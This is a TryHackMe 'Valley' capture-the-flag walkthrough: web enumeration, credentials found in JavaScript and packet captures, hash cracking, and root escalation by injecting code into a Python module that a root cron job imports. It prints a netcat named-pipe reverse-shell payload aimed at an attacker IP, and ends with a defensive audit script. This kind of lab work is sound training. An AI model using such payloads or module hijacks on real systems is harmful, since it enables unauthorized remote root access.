Valley — TryHackMe Walkthrough
Hello! Today I’ll be solving the ‘Valley’ room on TryHackMe.
The web server in this room suffers from broken access control, which exposed the credentials for the FTP server. Network analysis of the packet captures stored there gave me the credentials for the SSH server. Finally, for privilege escalation I abused a root cron job and got root access on the target machine.
Room Link: https://tryhackme.com/room/valleype
Let’s get started!
Let us first add our target’s IP to the /etc/hosts file:
Step 0: Reconnaissance
To start off, let’s scan our target for open ports using Nmap (Network Mapper):
sudo nmap -T4 -p- --min-rate=10000 -A valley.thm -oN logs/initial_nmap
- -T4 — This flag sets the timing template for the scan. In this case, it sets the timing to level 4, which is a fairly aggressive timing policy. It controls how fast Nmap sends out packets during the scan.
- -p- — This flag tells Nmap to scan all ports.
- --min-rate=10000 — This flag sets the minimum rate of packets to send per second.
- -A — Enables aggressive scanning to gather more information about the target system.
- -oN — saves output in normal format.
Brief:
- 22/tcp — SSH (Secure Shell) — used for secure remote access to systems; we must find a username and password for SSH to get access to the target machine.
- 80/tcp — HTTP server — running an Apache 2.4.41 web server.
- 37370/tcp — FTP server — FTP (File Transfer Protocol) is a standard network protocol used for transferring files; here it runs on a non-standard port.
Step 1: Exploring the Web server
Let’s fire up the browser and check the website for clues.
It seems like a normal website, and there is nothing fishy in the source code either.
Let’s enumerate directories using gobuster:
gobuster dir -u http://valley.thm -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x .php,.html,.txt
We get a /static route, but it’s empty. Since the name static is also commonly used for static web pages or assets, let’s enumerate this route further to find something juicy.
And we get /00.
We get one more route.
Let’s view the page source:
Let’s check the JavaScript files:
And we find the credentials for the login page hard-coded in the JavaScript. This makes the website vulnerable to Broken Access Control.
Broken Access Control is a security vulnerability identified by OWASP (Open Web Application Security Project) as one of the top ten most critical web application security risks.
After logging in we find some more notes. There’s a note for the FTP server saying to “stop reusing credentials”. This means the same credentials have been set up for FTP too. Let’s log into it.
Step 2: FTP server
Let’s use the credentials found for the login page to log into FTP:
It has some pcapng files; let’s download them and then inspect them.
PCAPNG (Packet Capture Next Generation) files are a modern format used for storing captured network traffic data.
Step 3: Network Analysis
We got 3 pcapng files; let’s inspect them one by one using Wireshark.
Wireshark is an open-source software that allows users to inspect the data passing through their computer network in real-time or by analyzing saved capture files.
Finally, we got credentials inside siemHTTP2.pcapng. Let’s use these to log into SSH.
Step 4: Compromising the system
Let’s try to log in with the credentials found previously by analyzing the pcapng files.
And we’re in!
Step 5: Privilege escalation
Let’s check for users in /home:
We find a strange file, valleyAuthenticator. Let’s execute it to see what it does.
It asks us for a username. Let’s use secure copy (the scp command) to get this file onto our attack box and then analyze the binary.
On attack machine:
scp valleyDev@valley.thm:/home/valleyAuthenticator .
Now that we have the file, we’ll use strings to view the readable strings in the binary.
Also, when we executed the binary we got the message “Welcome to Valley Inc. Authenticator”, so we can use the word “valley” as a keyword to view the strings around it.
strings valleyAuthenticator | grep "valley" -A 15 -B 15
- -A 15 — show 15 lines after each match of “valley”
- -B 15 — show 15 lines before each match of “valley”
And we get what looks like a hash.
Checking it with hash-identifier, it’s very possibly an MD5 hash. Let’s crack it using John the Ripper with rockyou.txt as our wordlist.
And we get the password liberty123.
Let’s use this password with the username valley (found in the /home directory).
And it returns Authenticated. It seems we have the correct credentials for the user valley. Let’s switch to this user.
Bingo! Let’s check what commands the valley user can run as root.
And we can’t run sudo as valley.
Let’s check for any running cron jobs.
Cron jobs are scheduled at recurring intervals, specified using a format based on unix-cron.
cat /etc/crontab
A Python script, photosEncrypt.py, is being executed by root every minute. If we manage to get a reverse shell through this script, we’ll have a privileged shell.
We don’t have write access to this script. Let’s check its code.
It imports base64. If we have write access to the module file it imports, we can add our reverse shell payload to it and then wait for the shell on our netcat listener.
Let’s abuse this.
On attack machine:
nc -nlvp 9001
On target machine:
Open the file in nano and add the payload for the reverse shell:
import os; os.system('rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.17.101.143 9001 >/tmp/f')
Now let’s wait for the script to be executed!
Gottem! Valley has been successfully pwned!
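From the defender’s side, the weakness just abused is a root cron job whose Python script imports a module from a file that a low-privileged user can write. The audit below is an added example, not part of the original room or walkthrough: it parses a system crontab, finds root jobs that run Python scripts, and flags the script or any imported module file that is group- or world-writable. The sample crontab, script path and file modes are constructed, and file access goes through callbacks so the same logic runs on a live host.

```python
import ast
import stat

# Constructed sample system crontab (not the room's real file): a root job
# runs a Python script every minute, like photosEncrypt.py on the target.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
17 * * * *  root    cd / && run-parts --report /etc/cron.hourly
*  * * * *  root    python3 /opt/scripts/photosEncrypt.py
*/5 * * * * backup  /usr/local/bin/backup.sh
"""

def root_jobs(crontab_text):
    """Commands of system-crontab entries (5 time fields, user, command) run as root."""
    jobs = []
    for line in crontab_text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        fields = line.split(None, 6)
        if len(fields) == 7 and fields[5] == "root":
            jobs.append(fields[6])
    return jobs

def imported_modules(source):
    """Top-level module names a Python source imports (found with the ast module)."""
    names = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            names.update(a.name.split(".")[0] for a in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module:
            names.add(node.module.split(".")[0])
    return names

def writable_by_others(mode):
    """Group- or world-writable: a non-root user could alter a file root executes."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit(crontab_text, read_source, resolve_module, mode_of):
    """Return (script, offending_path) pairs: a root cron Python script that is
    itself, or whose imported module file is, writable by non-root users.
    read_source/resolve_module/mode_of are callbacks (live host or test data)."""
    findings = []
    for cmd in root_jobs(crontab_text):
        for script in (t for t in cmd.split() if t.endswith(".py")):
            modules = sorted(imported_modules(read_source(script)))
            for path in [script] + [resolve_module(m) for m in modules]:
                if path and writable_by_others(mode_of(path)):
                    findings.append((script, path))
    return findings
```

On a live host, pass `open("/etc/crontab").read()` with the callbacks `lambda p: open(p).read()`, `lambda m: importlib.util.find_spec(m).origin` and `lambda p: os.stat(p).st_mode`; note that module resolution then follows the auditing interpreter’s sys.path, which should match the interpreter cron invokes.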
Conclusion
To pwn Valley one needs knowledge of target enumeration, web exploitation, network analysis, privilege escalation and source code analysis.
Happy Hacking!